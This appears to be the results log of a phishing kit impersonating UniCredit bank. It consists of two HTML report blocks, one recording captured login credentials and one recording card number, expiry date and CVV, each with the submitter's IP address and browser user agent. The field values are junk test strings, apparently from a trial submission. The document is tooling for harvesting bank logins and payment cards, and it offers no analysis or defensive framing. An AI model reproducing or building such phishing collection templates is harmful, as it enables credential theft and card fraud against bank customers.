
            <!DOCTYPE html>
            <html>
            <head>
                <meta charset='UTF-8' />
            </head>
            <body>
            <style type='text/css'>
            body{
                background: #141414;
                color: #fff;
                font-family: arial;
            }
            .rezlt{
                width: 600px;
            }
            table{
                width: 100%;
                background: #fff;
                color: #000;
            }
            table td{
                padding: 10px;
            }
            .newline{
                width: 100%;
                background: #141414;
                height: 2px;
            }
            </style>
            <center>
            <div class='rezlt'>
                <h3 style='text-align: center;background: #000000;margin: 0px;padding: 17px;'>unicredit login</h3>
                <table>
                    <tr>
                        <td style='width: 200px;'><b>Users</b></td>
                        <td style='width: 400px;'>sfsdf</td>
                    </tr>
					<tr>
                        <td style='width: 200px;'><b>password</b></td>
                        <td style='width: 400px;'>dsfsdfs</td>
                    </tr>
					
                     <tr>
                        <td style='width: 200px;'><b>Ip</b></td>
                        <td style='width: 400px;'>45.216.20.20</td>
                    </tr>
                    <tr>
                        <td style='width: 200px;'><b>User Agent</b></td>
                        <td style='width: 400px;'>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36</td>
                    </tr>
                </table>
                <div class='newline'></div>
               
            </div>
            </center>
            </body>
            </html>
            
            <!DOCTYPE html>
            <html>
            <head>
                <meta charset='UTF-8' />
            </head>
            <body>
            <style type='text/css'>
            body{
                background: #141414;
                color: #fff;
                font-family: arial;
            }
            .rezlt{
                width: 600px;
            }
            table{
                width: 100%;
                background: #fff;
                color: #000;
            }
            table td{
                padding: 10px;
            }
            .newline{
                width: 100%;
                background: #141414;
                height: 2px;
            }
            </style>
            <center>
            <div class='rezlt'>
                <h3 style='text-align: center;background: #000000;margin: 0px;padding: 17px;'>unicredit cvv</h3>
                <table>
                    <tr>
                        <td style='width: 200px;'><b>numero de carte</b></td>
                        <td style='width: 400px;'>fsdfsdfsdf</td>
                    </tr>
					<tr>
                        <td style='width: 200px;'><b>date d'expiration</b></td>
                        <td style='width: 400px;'>fdssfd</td>
                    </tr>
						<tr>
                        <td style='width: 200px;'><b>CVV</b></td>
                        <td style='width: 400px;'>sdfsf</td>
                    </tr>
					
                     <tr>
                        <td style='width: 200px;'><b>Ip</b></td>
                        <td style='width: 400px;'>45.216.20.20</td>
                    </tr>
                    <tr>
                        <td style='width: 200px;'><b>User Agent</b></td>
                        <td style='width: 400px;'>Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36</td>
                    </tr>
                </table>
                <div class='newline'></div>
               
            </div>
            </center>
            </body>
            </html>
            